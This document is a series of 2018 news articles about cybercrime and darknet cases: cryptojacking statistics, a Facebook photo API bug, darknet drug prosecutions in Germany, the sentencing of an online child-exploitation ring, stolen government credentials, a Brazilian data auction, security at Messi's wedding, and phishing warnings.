The year 2018 has seen a surge in cryptocurrency-mining malware by four times in the Middle East, Turkey, and Africa (META) regions according to anti-virus firm Kaspersky Lab. Some 13 million cases were registered around the world for such malicious software infections that redirect a portion of the host’s computer processing power towards mining cryptocurrency for the guest. A four-time increase from 3.5 million cases back in 2017.

It’s important to know that there are two types of cryptojacking:

1) The first one involves mining software injected directly into the host’s computer files. They’re usually delivered by malicious links and through some form of scamming or deceit.

2) The second type refers to in-browser mining scripts that run as long as the visitor stays on the page. Some are legitimate mining scripts installed by their respective website owners, while others are malicious scripts injected by third-party actors. The former is considered the safest form of cryptojacking, being approved by the website owner, while the latter exploits both the website and its viewers. Most of the hidden scripts were injected into streaming websites, especially pornographic or pirating sites, forums, and similar places where the user is inclined to spend much time.

The source code on a cryptojacking website with the beneficiary wallet address. Screenshot author Pranshu Bajpai, CC BY-ND

Some might argue that almost all cryptojacking cases are unethical, thus the name ‘jacking.’ The embedded mining software is almost never brought to the attention of the visitor but instead happens secretly, without disclosure — everything at the expense of the user who may not even realize that his processing power and electricity are being spent to create and send cryptocurrency to an unknown wallet. It’s fundamental to keep in mind that even if unnoticeable, the mining process drains the battery, consumes electricity, and works the processor and video card which in turn, can make the system run slowly, reduce its life-span, or even damage the hardware by overloading.

An example of CPU overutilization from hidden cryptocurrency mining in an extension

Although the whole world is affected by the attacks, less-developed countries from Africa, South America, and the Middle East seem to experience the majority of the attacks.

According to a study made by Bad Packets Report on February 2018, it showed that 34,474 websites are executing Coinhive, the most popular cryptojacking JavaScript. Another research from AdGuard found that the total profit from cryptojacking is around $150,000 per month from which a third goes to the mining network and the rest to the website owner.

There are some exceptions to the rule, however — cases in which websites ask for the clear consensus of the user in using some of its processing power to generate cryptocurrency. Transparent cases such as these are considered legitimate and safe. For example, this UNICEF website asks your permission to mine cryptocurrency off your browser for charity.

Although the mining scripts are merely tools that can even serve a useful purpose, as mentioned above, the situation got out of hand. A few months ago, Google announced a general ban on all plugins and extension involving cryptocurrency mining from its Chrome browser, whether white or black hat.

“Until now, Chrome Web Store policy has permitted cryptocurrency mining in extensions as long as it is the extension’s single purpose, and the user is adequately informedabout the mining behavior. Unfortunately, approximately 90% of all extensions with mining scripts that developers have attempted to upload to Chrome Web Store have failed to comply with these policies, and have been either rejected or removed from the store.”

Individuals are not the only ones targeted: businesses are too. Company-owned computers are very sought-after targets since they’re continually functioning in large numbers and usually lacking adequate security protocols. More so, hackers have adapted the script-injection methodology specifically for commercial companies through ‘formjacking.’ It refers to a malicious Javascript inserted into the payment process of a website. The credit card information is then obtained. Most recently, in June 2018, Ticketmaster had 40,000 customer records compromised, and in September 2018, British Airways encountered a similar attack on 400,000 clients.

As a first defense system, the National Cyber Security Centre’s board toolkit is an excellent starting point. Adblockers, antivirus programs, and mining-blocking browsers are must-haves against cryptojacking.

SOURCES:

https://www.postonline.co.uk/commercial/3912976/hiscoxs-james-brady-on-why-cyber-knowledge-remains-a-barrier

http://theconversation.com/cryptojacking-spreads-across-the-web-94088

https://www.bleepingcomputer.com/news/security/around-5-percent-of-all-monero-currently-in-circulation-has-been-mined-using-malware/

https://badpackets.net/how-to-find-cryptojacking-malware/

https://www.csoonline.com/article/3253572/internet/what-is-cryptojacking-how-to-prevent-detect-and-recover-from-it.html

https://blog.chromium.org/2018/04/protecting-users-from-extension-cryptojacking.html

https://media.kasperskycontenthub.com/wp-content/uploads/sites/58/2018/06/27125925/KSN-report_Ransomware-and-malicious-cryptominers_2016-2018_ENG.pdf

 

Daniel F. (not real name), 21 years of age, ordered hundreds of grams of darknet marijuana for personal consumption through the post office in the German district of Pfaffenhofen. More precisely, he used to place orders of about 100 to 250 grams of marijuana each time, for a total of 800 grams paid in bitcoin. The judge gave the young man 60 hours of community work alongside drug rehabilitation.

The defendant has been judged by juvenile justice standards despite him being 21 years old. Thus, receiving a light sentenced compared to the minimum of one-year imprisonment of the adult penal code regarding the purchase of marijuana for personal use. The change in the judging regiment was made due to the defendant’s absence of criminal priors and good behavior. Also, the fact that the illegalities started when he was 18 years old and that no criminal enterprise was found.

Judge Ulrich Klose highlighted the ideas himself:

“That was a massive offense, but juvenile justice is about education.”

The judge then asked Daniel if he quit drugs:

“Then we could take a hair sample from you?”

To which the defendant replied:

“No, problem. Actually, I always wanted to stop it.”

The representative of the juvenile court confirmed the good behavior, saying he has volunteered in social and civic actions, traveled the world, and completed two internships.

It is clear that not only the public opinion but also the judicial practices have drastically changed when it comes to marijuana consumption. Such light sentences were unheard of in past decades. A similar case happened in Austria, where a man fueled his cannabis vice using fake euros and received only two months of prison time.

SOURCE: https://www.donaukurier.de/lokales/pfaffenhofen/DKmobil-Drogen-aus-dem-Darknet;art600,4018378

On 4th of December of 2018, Facebook announced that up to 1,500 apps created by 876 developers had unrestricted access to the user’s profile images, including unpublished photos and photos set to private. The application program interface (API) bug affected users from September the 13th to September 25th of 2018 and regards the applications which asked access to the profile images.

Facebook users who granted access to third-party apps from the fifteen thousand apps which had the problem, gave unhindered access to their profile images, whether public or private.

Affected users are being identified and notified by the company. Users can also access the following dedicated page to see if they’re affected: https://www.facebook.com/help/200632800873098

Tomer Bar, a Facebook developer, explained the Photo API bug:

“When someone gives permission for an app to access their photos on Facebook, we usually only grant the app access to photos people share on their timeline. In this case, the bug potentially gave developers access to other photos, such as those shared on Marketplace or Facebook Stories. The bug also impacted photos that people uploaded to Facebook but chose not to post. For example, if someone uploads a photo to Facebook but doesn’t finish posting it – maybe because they’ve lost reception or walked into a meeting – we store a copy of that photo for three days so the person has it when they come back to the app to complete their post.

Currently, we believe this may have affected up to 6.8 million users and up to 1,500 apps built by 876 developers. The only apps affected by this bug were ones that Facebook approved to access the photos API and that individuals had authorized to access their photos.

We’re sorry this happened. Early next week we will be rolling out tools for app developers that will allow them to determine which people using their app might be impacted by this bug. We will be working with those developers to delete the photos from impacted users.

We will also notify the people potentially impacted by this bug via an alert on Facebook. The notification will direct them to a Help Center link where they’ll be able to see if they’ve used any apps that were affected by the bug. (See example of user notification below)

We are also recommending people log into any apps with which they have shared their Facebook photos to check which pictures they have access to.”

Facebook users were exposed to this bug for 12 days, but it’s unclear if hackers exploited any vulnerabilities. Also, such API errors are not uncommon among corporations. Earlier this year, Twitter and Google were also affected by similar bugs which exposed the information of over 50 million people.

Source: https://developers.facebook.com/blog/post/2018/12/14/notifying-our-developer-ecosystem-about-a-photo-api-bug/

 

At the end of November 2018, a 52-year old Turkish man residing in Germany was convicted to nine years and nine months of prison for distributing hard drugs both on the streets and on the darkweb. The Criminal Police in Mühldorf, Germany declared it was one of the lengthiest investigations in its history, since the establishment of the Commissariat 4 for drug-related crimes.

The investigation was code-named “Vehicle” after the first piece of information the Kriminalpolizei of Mühldorf acquired about the target — that he was a car salesman.

In September 2017, the investigation group “Vehicle” was created to hunt down the criminal organization that was trafficking a relatively large amount of drugs in the region. Enough even to be considered the biggest dope-pushers in all of the Bavarian town of Altötting.

Amphetamine, pain-killers, marijuana, ecstasy, and cocaine (picture) were among the sold narcotics by the network. In addition to a secret drug and money hideout in the city center, a bar in the town of Neuötting was a common place for frequent meet-ups of the gang members. Each one had its duties; some were “runners” while others “negotiators.”

The first breakthrough came in October 2017 when a drug peddler for the gang was caught by a police checkpoint on the A94 highway. He was transporting several kilos of marijuana and one kilo of amphetamine, a large amount of ecstasy, and cocaine. The bust led to the raid and arrest of the 52-year-old ringleader in November 2017.

Shortly afterward, comprehensive and conclusive prosecution was issued against a variety of people involved. Criminal proceeding ensued against 50 other defendants, including darknet buyers and sellers, which prompted the mandated search raids of other 20 locations.

The operation was a complete success, and the investigation squad which consisted of six civil servants was dissolved.

SOURCE: https://www.polizei.bayern.de/oberbayern/news/presse/aktuell/index.html/289815

The Frankfurt Customs Investigation Office arrested a 32-year-old Dutchman in North Rhine-Westphalia on Tuesday, 11th of December 2018, after a sting operation. The operation was under the direction of the NRW Cybercrime task force in the Lower Rhine town of Kleve.

Investigators announced on Thursday that the man is under custody. He’s accused of selling marijuana, hashish, cocaine, amphetamines, and ecstasy tablets (photos) internationally on the darkweb.

Law enforcement was targeting the suspect since last summer. According to Cologne prosecutors, police found several kilograms of drugs, including 10 thousand ecstasy pills between his residence in the Netherlands and a holiday house in the Dutch province of Gelderland. Narcotic paraphernalia, laboratory utensils, and packaging material were also found.

The man is facing hard prison time regardless of what country is going to judge him, Germany or the Netherlands. Culprits caught between two or more countries will try their best to get judged in the country where the laws are in their favor. Although both countries have relaxed laws for personal consumption, they also have equally severe laws for hard drug trafficking.

Source: https://www.presseportal.de/blaulicht/pm/116258/4142305

https://www.welt.de/regionales/nrw/article185454080/Drogen-uebers-Darknet-verkauft-Dealer-festgenommen.html

The group called “Bored Group” was convicted at the beginning of December for manipulating minor girls on the internet to self-harm and perform sexual acts.

Christian Maire (photo) of Binghamton, N.Y., 40 years of age at the time of the sentencing, and the married father of two, was the ringleader of the organization and received the highest prison term, 40 years. He was busted by a former victim who helped the FBI.

Other culprits received similar prison terms:

1. Arthur Simpatico, 47 years old, of Mississauga, Ontario, Canada. Sentenced to 38 years;
2. Jonathan Negroni Rodriguez, 37 years old, of West Hollywood, California. Sentenced to 35 years;
3. Michal Figura, 36 years old, of Swarthmore, Pennsylvania. Sentenced to 31¼ years;
4. Odell Ortega, 37 years old, of Miami. Sentenced to 37½ years;
5. Brett Jonathan Sinta, 36 years old, of Hickory, North Carolina. Sentenced to 30½ years;
6. Caleb Young, 38 years-old, of Cuyahoga Falls, Ohio. Sentenced to 30 years;
7. Daniel Walton, 34 years old, of Saginaw, Texas. Sentenced to 30½ years;
8. William T. Phillips, 39, of Highland, New York. Sentenced to 33 years.

The organization would lure young girls aged 8-17 through social media and online chatrooms posing as a group of teenage boys. Sexual acts and even a few instances of self-harming were requested of the girls after elaborate psychological scams to win trust.

In other words, using fake profiles, pictures, and videos of young boys, the gang would act convincingly on teenage dating websites such as MyLOL.com, Gifyo, Periscope, and YouNow. Each member had its role and worked systematically. The group would comment on old and non-sexual posts of girls to stand out of the crowd, and then they’d send chatrooms invitations.

The psychological bond of the group with the victims was developed over long periods of time around topics like school, family, sports, and sex. Furthermore, the final manipulative strategies to get the victims to undress were also well-thought. For example, the dares or challenges would gradually progress to sexual requests alongside strategic compliments. Another technique involves competitions between victims to see who performs the most outrageous actions. But probably the most interesting psychological tactic resides in the group’s frequent use of the word “bored” as to appear authentic and reassuring. Apart from being in the name of the group, chatrooms or certain posts would also be called “justsobored,” “borednstuff,” and “boredascanbe.” The word was used to give the illusion of a bored group of innocent teenage boys.

On the other hand, the organization also had a defense strategy. First of all, as stated before, the group never commented on sexual posts. Second of all, the group had an entire network of “Hero” or “White Knight” investigation teams that would alert the group of the existence of people that might warn the victim of the scheme. Such networks were used for other purposes and were both internal and external of the group’s nucleus. More so, archives were kept with the personal information of each victim, as well as other details involving past or current scams. Chatrooms were also categorized in “camping rooms,” where victims were expected to return and “regular rooms, ” where victims would appear at least once per week.

The downfall of the group started in 2017 when a group member linked the “Bored Group” to the news of a bust of an unrelated sexual predator which confirmed the FBI’s suspicions.

Some of the victims spoke up about the mental and social scars. A woman from New Orleans, tricked when she was 16, declared last week at the sentencing:

“I am a 20-year-old girl standing here today, facing the monsters that destroyed my childhood due to child exploitation. (…) I enjoyed having ‘friends’ to talk to every day. They were always there no matter what time of day. “

The woman described how she was tricked into the scheme. Several videos were made of her which were used for blackmail. The stress and psychological abuse lead to self-harm, hospitalization, and even suicide attempts:

“I know they knew I was hurting, because they would watch me cry and some would even ask me to self-harm while they watched. Thinking back to those days causes me to cry myself to sleep, wondering when the monsters will stop haunting me.”

Tragically, the group sobbed as well upon hearing the decades-worth of punishment they have to face. The leader of the group begged for mercy, and although the U.S. District Judge Stephen Murphy sparred him life in prison, the final sentence totaled not a day less than four decades of prison.

Source: https://eu.freep.com/story/news/local/michigan/detroit/2018/12/12/sexual-predators-christian-maire-teen-girls-online/2233922002/

Over 40 thousand accounts for government websites were found on the darkweb from countries including Saudi Arabia, Italy, Israel, Portugal, Switzerland, Norway, Georgia, Bulgaria, and Romania.

More than half of the accounts (52%) belong to Italian government officials, followed by Saudi Arabian government accounts (22%), and Portugal government accounts (5%).

Group-IB’s is a Russian IT security firm headquartered in Moscow, and it is considered one of the top global vendors of threat intelligence on the market. Head of Group-IB’s Computer Emergency Response Team (CERT-GIB), Alexandr Kalinin, explained that the access credentials were most likely for sale. Their research indicated that the hackers used fairly common pieces of malware and trojans to gather the list. The potentially used software names include Pony, AZORult Infostealer, and Qbot.

Mr. Kalinin believes the list was acquired over time from large samples of victims around the world and then categorized in public officials and privates. Although the credentials vary significantly in importance from local portals to high-level governmental websites, they still pose a high risk in the case of a determined attacker.

The compromised accounts were from a wide array of government agencies. They varied from accounts on local government sites to state-level agencies and official government portals. Some of the most high-profile access areas offered by the hackers include: Switzerland (admin.ch), Poland (gov.pl), Bulgaria (government.bg), Romania (gov.ro), Norwegian Directorate of Immigration (udi.no), Ministry of Finance of Georgia (mof.ge), Israel Defense Forces (idf.il), Italian Ministry of Defense (difesa.it), Ministry of Foreign Affairs of Romania, Ministry of Foreign Affairs of Italy etc.

“The scale and simplicity of government employees’ data compromise, shows that users, due to their carelessness and lack of reliable cyber defense, fall victims to hackers. Cybercrime has no borders and affects private and public companies and ordinary citizens, ” declared Alexandr Kalinin.

The Group-IB took the investigative initiative after following a discovery by Agari IT group who identified another group of scammers with a similar list of 50,000 global CEOs. Most likely used for cyber reconnaissance missions such as Business Email Compromise (BEC) scams.

Source: https://www.zdnet.com/article/over-40000-credentials-for-government-portals-found-online/

Brazilian security firm Tempest has investigated recent darkweb auction-rooms of so-called “InfoSec Army.” The data sold was extracted from various Brazilian corporations, financial groups, and small businesses. Tempest estimated a total profit of $320 thousand in bitcoins by the end of August 2018:

“Some databases would have been sold on the InfoSec Army in trading sessions with more than 700 bids and the most valuable base would have been sold for six bitcoins. The forum contained the date and time of the trading sessions and information about each of the items for sale. Already the reverse auction happened Telegram froups.

The InfoSec Army page was taken off the air in August 2018; however, among the data for sale were users and passwords, administrative access to attacked environments, copies of documents, source codes, emails, images, and even complete databases. These archives can be combined with several others and used in different scams like opening accounts, extortion, or performing fraudulent transactions.

Vendors gave detailed descriptions of the ways they used to steal the data. Some evidence and samples were also offered so that buyers could validate the data.

In one case, the attacker says he bought access to a control panel with more than 2000 zombie computers. Investigating these computers, he arrived at the workstation of an employee of one of the companies that had the data stolen. From this station the attacker was able to move around the network, identify outdated systems and obtain administrative access to the domain controller, from where it was possible to access any computer on the network,” declared Tempest.

Although Brazil has been taking significant steps in the right direction in regards to cybersecurity, such attacks persist in Brazil. A 2017 study from Norton Cyber Security indicated that Brazil is the second highest cyberattacked country, affecting 62 million people, and costing $22 billion. Coincidentally, the data auction took place just a few weeks after The Brazilian Army’s Cyber Defense Command executed an unprecedented military and civilian exercise at Fort Marechal Rondon, Brazil, between July the 3rd and 6th, 2018. However, the markets are hopeful that the new president-elect Jair Bolsonaro will maintain his strong anti-corruption beliefs in hopes of cleaning the internet of crime as well.

SOURCE:

https://www.scriptbrasil.com.br/vida-digital/hackers-leiloando-dados-deep-web.html

https://dialogo-americas.com/en/articles/brazilian-army-conducts-unprecedented-cyberdefense-exercise

Back in June of 2017, famous soccer player Lionel Messi wanted a secure wedding where no information could leak out from the party premises. Fernando Villares from the InteliX Ingeniería company was in charge of security at the wedding and succeeded in isolating the perimeter from the outside world by using free software and tools. Most interestingly, the guest were all carrying phones.

During the VoIP2Day 2018, held a few weeks ago in Madrid, there was a conference given by Fernando Villares entitled “Security is not a game, football YES,” where he explained his methodology.

It all started when Fernando found a reward of the equivalent of $12,500 in bitcoin on the dark web for the guest list and other information about Messi’s wedding. He reached out to Messi through the wedding organizer Adrián Pavía, who is also a common friend, and ended up working for Messi as no cybersecurity was in place for the event what so ever.

First of all, the City Center casino hotel in Rosario, Argentina was open to the public the previous days. The venue would have to be prepared for a private party with a large number of athletes, models, employees, suppliers and organizers, and some €1,7 million in insurance money.

Although there was a confidentiality agreement and a prohibition to introduce telephones in the area, another contractual clause prevented the organizers from confiscating any phones. Besides, no enforcement of the rule was viable anyway taking into consideration the VIP-status of each guest. Furthermore, the medium consisted of various signal waves, Bluetooth connections, extensive computer equipment, lighting and sound systems, external threats such as drones, paparazzi etc. So, Fernando had to anticipate all the aforementioned in his security model. The solution, therefore, was to prevent communications without interfering with the event equipment.

The first step of the operation consisted of a physical examination of the area in which a hidden camera was found. Secondly, an Open Source Intelligence study was carried out on the guests, suppliers, and staff. Finally, the team analyzed both the radio spectrum with simple Digital Terrestrial Television cards, encrypt all computer assets, and train key employees with access to sensitive information employees with access to sensitive information.

More precisely, the devices were encrypted with the TLS cryptographic protocol and SRTP profiles, disposable SIM cards were also used, and inside communication was made through Telegram and walkie-talkies encoded on VHF frequencies.

When all of the internal security systems were in place, the team decided to implement an informational “bunker” by asking the authorization of the Ministry of Justice to use equipment capable of blocking the frequencies of GSM 2G, 3G, 4G and WiFi 2.4 and 5.8 GHz frequencies, and as a consequence, Bluetooth and DECT cordless telephones. It was for the first time such efficient security measures were set in motion at a civic event in Argentina.

As post-event precautions, the squad had a global detection system to see in real time if something was leaking, as well as bots on social networks that searched for keywords. They also had established a wired zone for the use of its digital transmitters by the television channels, so that if they left it, they lost the signal.

The mission was a success, and no unwanted photos or videos came out of the event. As a fun fact, some media outlets accused the security experts of working for Israel just because the team used the keyword “Mossad.”

Source:

https://www.xatakamovil.com/seguridad/asi-se-blindaron-comunicaciones-boda-messi

 

Multiple instances of ongoing e-mail phishing to Amazon, Paypal, and Sparkasse clients have been registered in the past days. Currently, the hackers are creating e-mails that ask consumers to enter their data on false claims and pretexts, as reported by the consumer center of North Rhine-Westphalia.

One e-mail falsely claimed that the legislation has changed due to Brexit, therefore requiring the user to relog personal information or credentials. This particular e-mail sent on 6th of December had an overdue deadline for the end of November. More precisely, hackers would also involve a submission deadline in their e-mail in order to induce psychological pressure on the victim. All of which is tied with a false claim o pretext. For example, invoking newly-passed legislation such as the recent EU data protection regulation, or a significant change in company policy, or similar vague excuses.

Internet users should have anti-viruses installed on all devices and should pay attention to fine details that unravel phishing traps. Things to look out for include the absence of the “https,” spelling and grammatical errors, unclickable brand logos, and unnatural link redirections or forms. One must take into account that the creators are getting more and more sophisticated and experienced, so nothing is foolproof. Users should exert caution and skepticism at all times.

The financial group Sparkasse asks everyone to forward any suspicious e-mails to “warnung@sparkasse.de” and then delete them.

Phishing example:

Sources:
https://www.verbraucherzentrale.nrw/wissen/digitale-welt/phishingradar/phishingradar-aktuelle-warnungen-6059